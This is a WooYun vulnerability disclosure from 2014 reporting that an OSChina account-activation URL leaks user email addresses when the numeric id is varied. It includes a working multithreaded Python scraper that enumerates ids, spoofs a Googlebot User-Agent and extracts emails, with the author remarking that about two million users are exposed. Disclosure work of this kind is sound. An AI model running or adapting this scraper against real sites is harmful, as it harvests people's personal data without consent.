当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-087711

漏洞标题:开源中国某处设计不当导致用户邮箱泄露(附测试程序)

相关厂商:开源中国

漏洞作者: Morker

提交时间:2014-12-18 18:45

修复时间:2014-12-23 18:46

公开时间:2014-12-23 18:46

漏洞类型:网络设计缺陷/逻辑错误

危害等级:中

自评Rank:7

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-12-18: 细节已通知厂商并且等待厂商处理中
2014-12-23: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

..

详细说明:

..

漏洞证明:

泄露地址:

http://www.oschina.net/home/activating?id=1


1.png


然后用python简单爬了爬

2.jpg


在学python,就贴贴代码交流交流:

#!/usr/bin/env python
#coding:utf-8
import threading
import re,time
import requests
from Queue import Queue
def getUrl():
url = []
for i in xrange(1,50): #这里就时想要获取多少邮箱了,我看的时候,有两百多万用户吧!
page = "http://www.oschina.net/home/activating?id=" + str(i)
url.append(page)
print "---------------Scan starting---------------"
return url
class GetMail(threading.Thread):
def __init__(self,queue):
threading.Thread.__init__(self)
self.queue = queue
self.headers = {'User-Agent' : 'Mozilla/5.0 (compatible; Googlebot/2.1; +[url]http://www.google.com/bot.html[/url])'}
self.key = re.compile(r'<td>(.*?@.*?)</td>')
self.start()
def run(self):
while True:
if con.acquire():
if self.queue.empty():
con.release()
break
else:
page = self.queue.get()
code = requests.get(page,headers=self.headers).text
mail = self.key.findall(code)
if len(mail) == 1:
print mail[0]
else:
pass
con.release()
con = threading.Lock()
def main():
threads = []
pages = getUrl()
queue = Queue()
for i in range(len(pages)):
queue.put(pages[i])
for i in range(50):
t = GetMail(queue)
threads.append(t)
for i in threads:
i.join()
print "---------------Scan ebding---------------"
if __name__ == "__main__":
main()
#url = "http://www.oschina.net/home/activating?id=2293091"
#headers = {'User-Agent' : 'Mozilla/5.0 (compatible; Googlebot/2.1; +[url]http://www.google.com/bot.html[/url])'}
#code = requests.get(url,headers=headers).text
#key = re.compile(r'<td>(.*?@.*?)</td>')
#mail = key.findall(code)
#print mail

修复方案:

...

版权声明:转载请注明来源 Morker@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-12-23 18:46

厂商回复:

最新状态:

2014-12-23:已处理,谢谢